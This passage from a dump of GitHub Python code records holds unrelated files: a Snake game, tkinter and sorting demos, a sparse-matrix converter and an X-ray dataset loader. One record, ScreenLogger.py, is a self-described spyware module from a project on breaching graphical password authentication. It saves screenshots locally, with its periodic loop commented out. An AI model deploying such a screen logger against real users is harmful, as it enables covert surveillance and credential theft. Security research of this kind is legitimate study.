snake=Snake(window,Cell_size)\n\ndef show_grid():\n for i in range(0,Nb_col):\n for j in range(0,Nb_Row):\n rect=pygame.Rect(i*Cell_size,j*Cell_size,Cell_size,Cell_size)\n pygame.draw.rect(window,pygame.Color(\"black\"),rect,1)\nclass Game():\n def __init__(self):\n # personnage\n self.food=Food(window,Cell_size,Nb_col,Nb_Row)\n self. snake=Snake(window,Cell_size)\n self.generate_food()\n def update(self):\n self.snake.move_snake()\n self.collide()\n self.game_over()\n\n \n def draw_elements(self):\n self.food.draw_food()\n self.snake.draw_snake()\n def collide(self):\n snake_length=len(self.snake.body)\n snake_head_block=self.snake.body[snake_length-1]\n food_block=self.food.block\n if snake_head_block.x==food_block.x and snake_head_block.y==food_block.y:\n self.generate_food()\n else:\n self.snake.body.pop(0)\n \n def game_over(self):\n snake_length=len(self.snake.body)\n snake_head=self.snake.body[snake_length-1]\n if snake_head.x not in range(0,Nb_col) or snake_head.y not in range(0,Nb_Row):\n print(\"game_over\")\n # font.render(\"hello\",pygame.Color(\"green\"),pygame.Color(\"black\"))\n pygame.quit()\n exit()\n for block in self.snake.body[0:snake_length-1]:\n if block.x==snake_head.x and block.y==snake_head.y:\n print(\"game_over\")\n # font.render(\"hello\",pygame.Color(\"green\"),pygame.Color(\"black\"))\n pygame.quit()\n exit()\n\n\n\n\n def generate_food(self):\n self.food=Food(window,Cell_size,Nb_col,Nb_Row)\n should_generate=True\n while should_generate:\n count=0\n for block in self.snake.body:\n if block.x==self.food.block.x and block.y==self.food.block.y: \n count+=1\n if count==0:\n should_generate=False\n else:\n self.food=Food(window,Cell_size,Nb_col,Nb_Row) \ngame=Game()\n# def collide \n# boucle principal\nwhile running:\n window\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running=False\n pygame.quit()\n exit()\n elif event.type==pygame.KEYDOWN:\n if event.key==pygame.K_RIGHT:\n game.snake.direction=\"right\"\n elif event.key==pygame.K_LEFT:\n game.snake.direction=\"left\"\n elif event.key==pygame.K_UP:\n game.snake.direction=\"top\"\n elif event.key==pygame.K_DOWN:\n game.snake.direction=\"down\"\n elif event.type==screen_update:\n game.update()\n window.fill(pygame.Color(\"white\"))\n show_grid()\n\n game.draw_elements()\n\n pygame.display.flip()\n clock.tick(60)\n ","repo_name":"Cephcode/Projets_recent","sub_path":"snake_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15945251465","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Menu\")\nroot.geometry('400x400')\n\nmyMenu = Menu(root)\nroot.config(menu=myMenu)\n\ndef fileNew():\n hideAllFrames()\n fileNewFrame.pack(fill=\"both\", expand=True)\n\ndef editCut():\n hideAllFrames()\n editCutFrame.pack(fill=\"both\", expand=True)\n\n# Hide all frames function\ndef hideAllFrames():\n fileNewFrame.pack_forget()\n editCutFrame.pack_forget()\n\n# Create a menu item\n\nfileMenu = Menu(myMenu, tearoff=0)\nmyMenu.add_cascade(label=\"File\", menu=fileMenu)\nfileMenu.add_command(label=\"New\", command=fileNew)\nfileMenu.add_separator()\nfileMenu.add_command(label=\"Exit\", command=root.quit)\n\n# Create and edit menu item\neditMenu = Menu(myMenu, tearoff=0)\nmyMenu.add_cascade(label=\"Edit\", menu=editMenu)\neditMenu.add_command(label=\"Cut\", command=editCut)\neditMenu.add_command(label=\"Copy\")\n\n# Create some frames\nfileNewFrame = Frame(root, width=400, height=400, bg=\"red\")\neditCutFrame = Frame(root, width=400, height=400, bg=\"blue\")\n\n\nroot.mainloop()","repo_name":"smamirov/tkinterTutorial","sub_path":"menuFrame.py","file_name":"menuFrame.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26647755293","text":"__all__ = [\"Daemon\", \"main\", \"config_load\"]\r\n\r\nfrom os.path import join, dirname, exists\r\nfrom configparser import ConfigParser\r\nfrom pyautogui import screenshot\r\nfrom os import makedirs, environ\r\nfrom sys import argv, exit\r\nfrom typing import List\r\nfrom time import sleep\r\nfrom glob import glob\r\n\r\n\r\nclass CONFIGURATIONS:\r\n\r\n \"\"\"\r\n This class contains configurations.\r\n \"\"\"\r\n\r\n save_filename: str = \"screenshot*.png\"\r\n save_dirname: str = \"Spywares/screenshots\"\r\n screenshot_interval: int = 3600\r\n\r\n\r\ndef config_load(filename: str = None, argv: List[str] = argv) -> int:\r\n\r\n \"\"\"\r\n This function loads the configuration using a the configuration file.\r\n \"\"\"\r\n\r\n CONFIG = ConfigParser()\r\n default_file_name = \"screenSpy.conf\"\r\n\r\n default_file_path = join(dirname(__file__), default_file_name)\r\n env_config_file = environ.get(default_file_name)\r\n arg_config_file = argv[1] if len(argv) == 2 else None\r\n\r\n if filename is not None and exists(filename):\r\n CONFIG.read(filename)\r\n elif arg_config_file is not None and exists(arg_config_file):\r\n CONFIG.read(arg_config_file)\r\n elif env_config_file and exists(env_config_file):\r\n CONFIG.read(env_config_file)\r\n elif exists(default_file_path):\r\n CONFIG.read(default_file_path)\r\n else:\r\n return 1\r\n\r\n CONFIG = CONFIG.__dict__[\"_sections\"]\r\n CONFIGURATIONS.save_filename = CONFIG.get(\"SAVE\", {}).get(\r\n \"filename\", \"screenshot*.png\"\r\n )\r\n CONFIGURATIONS.save_dirname = CONFIG.get(\"SAVE\", {}).get(\r\n \"dirname\", \"screenshots\"\r\n )\r\n CONFIGURATIONS.screenshot_interval = float(\r\n CONFIG.get(\"TIME\", {}).get(\"screenshot_interval\", \"3600\")\r\n )\r\n return 0\r\n\r\n\r\nclass Daemon:\r\n\r\n \"\"\"\r\n This class implements a loop to capture screen\r\n while the spyware is running.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.interval = CONFIGURATIONS.screenshot_interval\r\n self.run = True\r\n path = self.path = join(\r\n CONFIGURATIONS.save_dirname, CONFIGURATIONS.save_filename\r\n )\r\n self.increment = len(glob(path))\r\n\r\n def run_for_ever(self) -> None:\r\n\r\n \"\"\"\r\n This function takes the screenshot and sleep in a loop.\r\n \"\"\"\r\n\r\n makedirs(CONFIGURATIONS.save_dirname, exist_ok=True)\r\n increment = self.increment\r\n # interval = self.interval\r\n screenshot(self.path.replace(\"*\", str(increment)))\r\n\r\n # while self.run:\r\n # screenshot(self.path.replace(\"*\", str(increment)))\r\n # increment += 1\r\n # if self.run:\r\n # sleep(interval)\r\n\r\n\r\ndef main(config_filename: str = None, argv: List[str] = argv) -> int:\r\n\r\n \"\"\"\r\n This function executes this script from the command line.\r\n \"\"\"\r\n\r\n config_load(filename=config_filename, argv=argv)\r\n\r\n daemon = Daemon()\r\n\r\n try:\r\n daemon.run_for_ever()\r\n except KeyboardInterrupt:\r\n daemon.run = False\r\n\r\n return 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n exit(main())\r\n","repo_name":"Rtiwary-1/Graphical-Password-Authenticator-breach-using-spywares","sub_path":"Spywares/ScreenLogger.py","file_name":"ScreenLogger.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25756986001","text":"def quicksort(xs):\n if len(xs) <= 1:\n return xs\n\n pivot_index = len(xs) // 2\n pivot = xs[pivot_index]\n del xs[pivot_index]\n\n smaller = [_ for _ in xs if _ <= pivot]\n larger = [_ for _ in xs if _ > pivot]\n\n return quicksort(smaller) + [pivot] + quicksort(larger)\n\n\ndef mergesort(xs):\n def merge(xs, ys):\n zs = []\n while xs or ys:\n if xs and ys:\n x = xs[0]\n y = ys[0]\n if x <= y:\n zs += [x]\n xs = xs[1:]\n else:\n zs += [y]\n ys = ys[1:]\n elif xs:\n zs += xs\n break\n elif ys:\n zs += ys\n break\n return zs\n\n if len(xs) <= 1:\n return xs\n\n middle_index = len(xs) // 2\n left = xs[:middle_index]\n right = xs[middle_index:]\n\n return merge(mergesort(left), mergesort(right))\n\n\ndef selectionsort(xs):\n def swap(i, j):\n tmp = xs[i]\n xs[i] = xs[j]\n xs[j] = tmp\n\n def find_min_index(start_index):\n min_index = start_index\n for i in range(sorted_index, len(xs)):\n if xs[i] < xs[min_index]:\n min_index = i\n return min_index\n\n for sorted_index in range(len(xs)):\n # Ensure that all xs before `sorted_index` are sorted.\n assert xs[:sorted_index] == sorted(xs[:sorted_index])\n min_index = find_min_index(sorted_index)\n if min_index != sorted_index:\n swap(sorted_index, min_index)\n\n return xs\n","repo_name":"dbader/data-structures-py","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"27214183329","text":"from data.data_builder import DataBuilder\r\nfrom data.data_manager import *\r\nfrom auto_complete import *\r\n\r\n\r\ndef prepare_data(path):\r\n data = DataBuilder()\r\n try:\r\n sentences, sum_lines = build_data(path, data)\r\n print(\"complete reading sentences\")\r\n print(f\"read {sum_lines} lines\")\r\n save_data(sentences, \"/data/sentences.json\")\r\n except MemoryError:\r\n pass\r\n\r\n save_data(data.get_trie(), \"/data/data.json\")\r\n\r\n\r\ndef start():\r\n while True:\r\n sub_seq = input(\"The system is ready, insert your text:\")\r\n while sub_seq[-1] != END_INPUT:\r\n completes = get_best_complete(sub_seq, TRIE)\r\n print(\"here are {} suggestions:\".format(len(completes)))\r\n for i in range(len(completes)):\r\n print(f\"{i + 1}.\", completes[i])\r\n sub_seq += input(\"\\n\" + sub_seq)\r\n\r\n\r\nif __name__ == '__main__':\r\n # prepare_data(\"/2021-archive/python-3.8.4-docs-text/c-api\")\r\n start()\r\n","repo_name":"channamakover/Google-Project","sub_path":"Google project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30866885909","text":"#! /usr/bin/env python3\r\n#\r\ndef ccs_print ( m, n, ncc, icc, ccc, acc, title ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_print() prints a sparse matrix in CCS format.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows in the matrix.\r\n#\r\n# integer N, the number of columns in the matrix.\r\n#\r\n# integer NCC, the number of elements.\r\n#\r\n# integer ICC(NCC), the rows.\r\n#\r\n# integer CCC(N+1), the compressed columns.\r\n#\r\n# real ACC(NCC), the values.\r\n#\r\n# character TITLE, a title.\r\n#\r\n print ( '' )\r\n print ( title )\r\n print ( ' # I J A' )\r\n print ( ' ---- ---- ---- --------------' )\r\n print ( '' )\r\n\r\n if ( ccc[0] == 0 ):\r\n\r\n j = 0\r\n for k in range ( 0, ncc ):\r\n i = icc[k]\r\n while ( ccc[j+1] <= k ):\r\n j = j + 1\r\n print ( ' %4d %4d %4d %16.8g' % ( k, i, j, acc[k] ) )\r\n#\r\n# Matrix uses 1-based indexing.\r\n#\r\n else:\r\n\r\n j = 1\r\n for k in range ( 0, ncc ):\r\n i = icc[k]\r\n while ( ccc[j] <= k + 1 ):\r\n j = j + 1\r\n print ( ' %4d %4d %4d %16.8g' % ( k + 1, i, j, acc[k] ) )\r\n\r\n return\r\n\r\ndef ccs_to_st ( m, n, ncc, icc, ccc, acc ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st() converts sparse matrix information from CCS to ST format.\r\n#\r\n# Discussion:\r\n#\r\n# Only JST actually needs to be computed. The other three output \r\n# quantities are simply copies. \r\n# \r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license. \r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows.\r\n#\r\n# integer N, the number of columns.\r\n#\r\n# integer NCC, the number of elements.\r\n#\r\n# integer ICC(NCC), the rows.\r\n#\r\n# integer CCC(N+1), the compressed columns.\r\n#\r\n# real ACC(NCC), the values.\r\n#\r\n# Output:\r\n#\r\n# integer NST, the number of ST elements.\r\n#\r\n# integer IST(NST), JST(NST), the ST rows and columns.\r\n#\r\n# real AST(NST), the ST values.\r\n#\r\n import numpy as np\r\n\r\n ist = np.copy ( icc )\r\n jst = np.zeros ( ncc, dtype = np.int )\r\n ast = np.copy ( acc )\r\n\r\n nst = 0\r\n\r\n if ( ccc[0] == 0 ):\r\n\r\n jlo = 0\r\n jhi = n - 1\r\n \r\n for j in range ( jlo, jhi + 1 ):\r\n\r\n klo = ccc[j]\r\n khi = ccc[j+1]\r\n\r\n for k in range ( klo, khi ):\r\n\r\n jst[nst] = j\r\n nst = nst + 1\r\n\r\n else:\r\n\r\n ist = ist - 1\r\n\r\n jlo = 0\r\n jhi = n - 1\r\n \r\n for j in range ( jlo, jhi + 1 ):\r\n\r\n klo = ccc[j] - 1\r\n khi = ccc[j+1] - 1\r\n\r\n for k in range ( klo, khi ):\r\n\r\n jst[nst] = j\r\n nst = nst + 1\r\n\r\n return nst, ist, jst, ast\r\n\r\ndef ccs_to_st_test01 ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test01() tests ccs_to_st() using a 1-based matrix.\r\n#\r\n# Discussion:\r\n#\r\n# This test uses a trivial matrix whose full representation is:\r\n#\r\n# 2 3 0 0 0\r\n# 3 0 4 0 6\r\n# A = 0 -1 -3 2 0\r\n# 0 0 1 0 0\r\n# 0 4 2 0 1\r\n#\r\n# The 1-based CCS representation is\r\n#\r\n# # ICC CCC ACC\r\n# -- --- --- ---\r\n# 1 1 1 2\r\n# 2 2 3\r\n#\r\n# 3 1 3 3\r\n# 4 3 -1\r\n# 5 5 4\r\n#\r\n# 6 2 6 4\r\n# 7 3 -3\r\n# 8 4 1\r\n# 9 5 2\r\n#\r\n# 10 3 10 2\r\n#\r\n# 11 2 11 6\r\n# 12 5 1\r\n#\r\n# 13 * 13\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n m = 5\r\n n = 5\r\n ncc = 12\r\n\r\n acc = np.array ( [ \\\r\n 2.0, 3.0, \\\r\n 3.0, -1.0, 4.0, \\\r\n 4.0, -3.0, 1.0, 2.0, \\\r\n 2.0, \\\r\n 6.0, 1.0 ] )\r\n\r\n ccc = np.array ( [ \\\r\n 1, 3, 6, 10, 11, 13 ] )\r\n\r\n icc = np.array ( [ \\\r\n 1, 2, \\\r\n 1, 3, 5, \\\r\n 2, 3, 4, 5, \\\r\n 3, \\\r\n 2, 5 ] )\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test01()' )\r\n print ( ' Convert a 1-based CCS matrix to ST format.' )\r\n#\r\n# Print the CCS matrix.\r\n#\r\n ccs_print ( m, n, ncc, icc, ccc, acc, ' The CCS matrix:' )\r\n#\r\n# Convert it.\r\n#\r\n nst, ist, jst, ast = ccs_to_st ( m, n, ncc, icc, ccc, acc )\r\n#\r\n# Print the ST matrix.\r\n#\r\n st_print ( m, n, nst, ist, jst, ast, ' The ST matrix:' )\r\n\r\n return\r\n\r\ndef ccs_to_st_test02 ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test02() tests ccs_to_st() using a 0-based matrix.\r\n#\r\n# Discussion:\r\n#\r\n# This test uses a trivial matrix whose full representation is:\r\n#\r\n# 2 3 0 0 0\r\n# 3 0 4 0 6\r\n# A = 0 -1 -3 2 0\r\n# 0 0 1 0 0\r\n# 0 4 2 0 1\r\n#\r\n# The 0-based CCS representation is\r\n#\r\n# # ICC CCC ACC\r\n# -- --- --- ---\r\n# 0 0 0 2\r\n# 1 1 3\r\n#\r\n# 2 0 2 3\r\n# 3 2 -1\r\n# 4 4 4\r\n#\r\n# 5 1 5 4\r\n# 6 2 -3\r\n# 7 3 1\r\n# 8 4 2\r\n#\r\n# 9 2 9 2\r\n#\r\n# 10 1 10 6\r\n# 11 4 1\r\n#\r\n# 12 * 12\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n m = 5\r\n n = 5\r\n ncc = 12\r\n\r\n acc = np.array ( [ \\\r\n 2.0, 3.0, \\\r\n 3.0, -1.0, 4.0, \\\r\n 4.0, -3.0, 1.0, 2.0, \\\r\n 2.0, \\\r\n 6.0, 1.0 ] )\r\n\r\n ccc = np.array ( [ \\\r\n 0, 2, 5, 9, 10, 12 ] )\r\n\r\n icc = np.array ( [ \\\r\n 0, 1, \\\r\n 0, 2, 4, \\\r\n 1, 2, 3, 4, \\\r\n 2, \\\r\n 1, 4 ] )\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test02():' )\r\n print ( ' Convert a 0-based CCS matrix to ST format.' )\r\n#\r\n# Print the CCS matrix.\r\n#\r\n ccs_print ( m, n, ncc, icc, ccc, acc, ' The CCS matrix:' )\r\n#\r\n# Convert it.\r\n#\r\n nst, ist, jst, ast = ccs_to_st ( m, n, ncc, icc, ccc, acc )\r\n#\r\n# Print the ST matrix.\r\n#\r\n st_print ( m, n, nst, ist, jst, ast, ' The ST matrix:' )\r\n\r\n return\r\n\r\ndef ccs_to_st_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test() tests ccs_to_st().\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test():' )\r\n print ( ' Python version: ' + platform.python_version ( ) )\r\n print ( ' Test ccs_to_st().' )\r\n\r\n ccs_to_st_test01 ( )\r\n ccs_to_st_test02 ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'ccs_to_st_test():' )\r\n print ( ' Normal end of execution.' )\r\n\r\n return\r\n\r\ndef st_print ( m, n, nst, ist, jst, ast, title ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## st_print() prints an ST matrix.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows.\r\n#\r\n# integer N, the number of columns.\r\n#\r\n# integer NST, the number of nonzeros.\r\n#\r\n# integer IST(NST), JST(NST), the row and column indices.\r\n#\r\n# real AST(NST), the nonzero values.\r\n#\r\n# string TITLE, a title.\r\n#\r\n print ( '' )\r\n print ( title )\r\n print ( ' %d rows by %d columns' % ( m, n ) )\r\n print ( '' );\r\n\r\n for k in range ( 0, nst ):\r\n print ( ' %8d %8d %8d %16.8f' % ( k, ist[k], jst[k], ast[k] ) )\r\n\r\n return\r\n\r\ndef timestamp ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## timestamp() prints the date as a timestamp.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license. \r\n#\r\n# Modified:\r\n#\r\n# 21 August 2019\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import time\r\n\r\n t = time.time ( )\r\n print ( time.ctime ( t ) )\r\n\r\n return\r\n\r\nif ( __name__ == '__main__' ):\r\n timestamp ( )\r\n ccs_to_st_test ( )\r\n timestamp ( )","repo_name":"jjeongGrp/MathSubroutines","sub_path":"Python3/ccs_to_st.py","file_name":"ccs_to_st.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21135939913","text":"import os\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nfrom skimage import transform\nfrom utils.Config import opt\nimport matplotlib.pylab as plt\nfrom sklearn.model_selection import train_test_split\nimport utils.array_tool as at\nimport matplotlib.patches as patches\nfrom data.data_utils import read_image\n\nDSB_BBOX_LABEL_NAMES = ('p') # Pneumonia\n\n\ndef inverse_normalize(img):\n if opt.caffe_pretrain:\n img = img + (np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1))\n return img[::-1, :, :].clip(min=0, max=255)\n # approximate un-normalize for visualize\n return (img * 0.225 + 0.45).clip(min=0, max=1) * 255\n\n\"\"\"Transforms:\nData augmentation\n\"\"\"\nclass Transform(object):\n def __init__(self, img_size):\n self.img_size = img_size\n\n def __call__(self, in_data):\n img_id, img, mask = in_data['img_id'], in_data['image'], in_data['mask']\n _, H, W = img.shape\n img, mask = preprocess(img, mask, self.img_size)\n\n return {'img_id': img_id, 'image': img.copy(), 'mask': mask.copy()}\n\n\ndef preprocess(img, mask, img_size):\n C, H, W = img.shape\n img = img / 255.\n img = transform.resize(img, (C, img_size, img_size), mode='reflect')\n mask = mask.astype(np.float32)\n mask = transform.resize(mask, (1, img_size, img_size), mode='reflect')\n # both the longer and shorter should be less than\n # max_size and min_size\n if opt.caffe_pretrain:\n normalize = caffe_normalize\n else:\n normalize = pytorch_normalze\n\n img = normalize(img)\n\n return img, mask\n\ndef pytorch_normalze(img):\n \"\"\"\n https://discuss.pytorch.org/t/how-to-preprocess-input-for-pre-trained-networks/683\n https://github.com/pytorch/vision/issues/223\n return appr -1~1 RGB\n \"\"\"\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n img = normalize(torch.from_numpy(img))\n return img.numpy()\n\n\ndef caffe_normalize(img):\n \"\"\"\n return appr -125-125 BGR\n \"\"\"\n img = img[[2, 1, 0], :, :] # RGB-BGR\n img = img * 255\n mean = np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1)\n img = (img - mean).astype(np.float32, copy=True)\n return img\n\nclass RSNADataset(Dataset):\n def __init__(self, root_dir, img_id, mask_id, transform=True):\n \"\"\"\n Args:\n :param root_dir (string): Directory with all the images\n :param img_id (list): lists of image id\n :param train: if equals true, then read training set, so the output is image, mask and imgId\n if equals false, then read testing set, so the output is image and imgId\n :param transform (callable, optional): Optional transform to be applied on a sample\n \"\"\"\n self.root_dir = root_dir\n self.img_id = img_id\n self.mask_id = mask_id\n self.transform = transform\n self.tsf = Transform(opt.img_size)\n\n def __len__(self):\n return len(self.img_id)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.root_dir, 'images', self.img_id[idx].split('.')[0], 'image.png')\n mask_path = os.path.join(self.root_dir, 'masks', self.mask_id[idx])\n image = read_image(img_path, np.float32, False)\n mask = read_image(mask_path, np.uint8, False)\n\n sample = {'img_id': self.img_id[idx], 'image':image.copy(), 'mask':mask.copy()}\n\n if self.transform:\n sample = self.tsf(sample)\n\n return sample\n\n\nclass RSNADatasetTest(Dataset):\n def __init__(self, root_dir, transform=True):\n \"\"\"\n Args:\n :param root_dir (string): Directory with all the images\n :param img_id (list): lists of image id\n :param train: if equals true, then read training set, so the output is image, mask and imgId\n if equals false, then read testing set, so the output is image and imgId\n :param transform (callable, optional): Optional transform to be applied on a sample\n \"\"\"\n self.root_dir = root_dir\n self.img_id = os.listdir(root_dir)\n self.transform = transform\n self.tsf = Transform(opt.img_size)\n\n def __len__(self):\n return len(self.img_id)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.root_dir, self.img_id[idx], 'image.png')\n image = read_image(img_path, np.float32, False)\n\n C, H, W = image.shape\n image = image / 255.\n image = transform.resize(image, (C, opt.img_size, opt.img_size), mode='reflect')\n if opt.caffe_pretrain:\n normalize = caffe_normalize\n else:\n normalize = pytorch_normalze\n\n image = normalize(image)\n\n sample = {'img_id': self.img_id[idx], 'image': image.copy()}\n\n return sample\n\ndef get_train_loader(root_dir, batch_size=16, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param split: if split data set to training set and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param val_ratio: ratio of validation set size\n :param pin_memory: store data in CPU pin buffer rather than memory. when using CUDA, set to True\n :return:\n - train_loader: Dataloader for training\n \"\"\"\n img_ids = os.listdir(root_dir)\n img_ids.sort()\n transformed_dataset = RSNADataset(root_dir=root_dir, img_id=img_ids, transform=True)\n dataloader = DataLoader(transformed_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n return dataloader\n\ndef get_train_val_loader(root_dir, batch_size=16, val_ratio=0.2, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param split: if split data set to training set and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param val_ratio: ratio of validation set size\n :param pin_memory: store data in CPU pin buffer rather than memory. when using CUDA, set to True\n :return:\n - train_loader: Dataloader for training\n - valid_loader: Dataloader for validation\n \"\"\"\n df = pd.read_csv(os.path.join(opt.root_dir, 'train.csv'))\n img_id, mask_id = list(df['image']), list(df['label'])\n train_img_id, val_img_id, train_mask_id, val_mask_id = train_test_split(img_id, mask_id, random_state=42, test_size=val_ratio, shuffle=False)\n\n train_dataset = RSNADataset(root_dir=root_dir, img_id=train_img_id, mask_id=train_mask_id, transform=True)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n val_dataset = RSNADataset(root_dir=root_dir, img_id=val_img_id, mask_id=val_mask_id, transform=True)\n val_loader = DataLoader(val_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n\n return train_loader, val_loader\n\ndef get_test_loader(batch_size=16, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param pin_memory: store data in CPU pin buffer rather than memory. when using CUDA, set to True\n :return:\n - testloader: Dataloader of all the test set\n \"\"\"\n transformed_dataset = RSNADatasetTest(root_dir=opt.test_root)\n testloader = DataLoader(transformed_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n return testloader\n\ndef show_batch_train(sample_batched):\n \"\"\"\n Visualize one training image and its corresponding bbox\n \"\"\"\n img_id, image, mask = sample_batched['img_id'], sample_batched['image'], sample_batched['mask']\n image, mask = np.squeeze(at.tonumpy(image)), np.squeeze(at.tonumpy(mask))\n\n image = inverse_normalize(image)\n\n combined = np.multiply(image, mask)\n ax1 = plt.subplot(121)\n ax1.imshow(image / 255.)\n ax1.set_title(img_id[0])\n ax2 = plt.subplot(122)\n ax2.imshow(combined / 255.)\n ax2.set_title(img_id[0])\n plt.show()\n\ndef show_batch_test(sample_batch):\n img_id, image = sample_batch['img_id'], sample_batch['image']\n image = inverse_normalize(np.squeeze(at.tonumpy(image[0])))\n plt.figure()\n plt.imshow(image/255)\n plt.show()\n\n\nif __name__ == '__main__':\n\n # Load training & validation set\n # train_loader, val_loader = get_train_val_loader(opt.root_dir, batch_size=1, val_ratio=0.2,\n # shuffle=False, num_workers=opt.num_workers,\n # pin_memory=opt.pin_memory)\n # for i_batch, sample in enumerate(val_loader):\n # print(sample['img_id'], ', ', sample['image'].shape, ', ', sample['mask'].shape)\n # show_batch_train(sample)\n\n test_loader = get_test_loader(batch_size=1, shuffle=False,\n num_workers=opt.num_workers,\n pin_memory=opt.pin_memory)\n for i_batch, sample in enumerate(test_loader):\n print(sample['img_id'], ', ', sample['image'].shape)\n show_batch_test(sample)\n","repo_name":"limingwu8/Lung-Segmentation","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10147,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"77"} +{"seq_id":"30494291318","text":"\"\"\"\nClass Property Transform\n\n@author Irfan Andriansyah \n\"\"\"\n\nimport os\nimport sys\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.types import StringType\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom helper.parser_helper import Parser # noqa\nfrom helper.spark.spark_helper import SparkHelper # noqa\nfrom helper.config.config_helper import get_config # noqa\n\n\nclass PropertyTracker:\n \"\"\"\n Transform data for property tracker\n \"\"\"\n\n def __init__(self):\n self.connection = SparkHelper.create_connection()\n self.parser = Parser()\n self.config = get_config()\n\n @staticmethod\n def get_udf(key, parse):\n \"\"\"\n Get User definition function for transform data search tracker\n \"\"\"\n return udf(lambda params: parse(key, params), StringType())\n\n @staticmethod\n def get_agent_name(firstName, lastName):\n \"\"\"\n Get firstName & lastName from user dataframe\n \"\"\"\n return '{} {}'.format(firstName, lastName)\n\n def get_parquet(self):\n \"\"\"\n Get Tracker parquet\n \"\"\"\n return SparkHelper.read_parquet(\n self.connection, self.config.get('data_source', 'result')\n )\n\n def main(self):\n \"\"\"\n Main Class for transform tracket dataset to search dataset\n 